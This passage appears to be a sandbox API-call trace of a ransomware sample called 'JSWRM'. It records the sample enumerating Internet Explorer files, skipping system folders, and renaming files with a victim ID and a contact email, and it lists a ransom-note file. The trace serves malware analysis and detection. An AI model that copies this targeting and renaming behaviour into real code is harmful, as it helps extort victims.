hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.370] CloseHandle (hObject=0xffffffff) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0069.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.371] MoveFileW (lpExistingFileName="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), lpNewFileName="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.371] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2=".") returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="..") returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="...") returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="windows") returned -1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="recovery") returned -1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="perflogs") returned -1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="documents and settings") returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="system volume information") returned -1 [0069.371] lstrcmpiW (lpString1="iexplore.exe.mui", lpString2="msocache") returned -1 [0069.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe.mui", cchWideChar=16, lpMultiByteStr=0x240ef8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe.mui", cchWideChar=16, lpMultiByteStr=0x241358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0069.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.372] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.372] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9660996358656808) returned 0 [0069.372] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0069.372] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0069.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.372] CloseHandle (hObject=0xffffffff) returned 1 [0069.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0069.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), lpNewFileName="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.373] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2000eabb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2000eabb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.373] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.374] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.374] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0069.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0069.374] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2000eabb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x2000eabb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x2000eabb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0069.374] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.374] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2=".") returned 1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2="..") returned 1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2="...") returned 1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2="windows") returned -1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2="recovery") returned -1 [0069.374] lstrcmpiW (lpString1="ExtExport.exe", lpString2="perflogs") returned -1 [0069.375] lstrcmpiW (lpString1="ExtExport.exe", lpString2="documents and settings") returned 1 [0069.375] lstrcmpiW (lpString1="ExtExport.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.375] lstrcmpiW (lpString1="ExtExport.exe", lpString2="system volume information") returned -1 [0069.375] lstrcmpiW (lpString1="ExtExport.exe", lpString2="msocache") returned -1 [0069.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtExport.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtExport.exe", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExtExport.exe", lpUsedDefaultChar=0x0) returned 13 [0069.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtExport.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtExport.exe", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExtExport.exe", lpUsedDefaultChar=0x0) returned 13 [0069.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.375] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2=".") returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="..") returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="...") returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="windows") returned -1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="recovery") returned -1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="perflogs") returned -1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="documents and settings") returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="system volume information") returned -1 [0069.375] lstrcmpiW (lpString1="hmmapi.dll", lpString2="msocache") returned -1 [0069.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f610, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hmmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0069.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hmmapi.dll", cchWideChar=10, lpMultiByteStr=0x345f5e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hmmapi.dll", lpUsedDefaultChar=0x0) returned 10 [0069.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.376] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7d000, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="iediagcmd.exe", cAlternateFileName="")) returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2=".") returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="..") returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="...") returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="windows") returned -1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="recovery") returned -1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="perflogs") returned -1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="documents and settings") returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="system volume information") returned -1 [0069.376] lstrcmpiW (lpString1="iediagcmd.exe", lpString2="msocache") returned -1 [0069.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iediagcmd.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iediagcmd.exe", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iediagcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0069.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iediagcmd.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iediagcmd.exe", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iediagcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0069.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.376] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a70c9a1, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xbc534b5e, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a70c9a1, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7a800, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2=".") returned 1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="..") 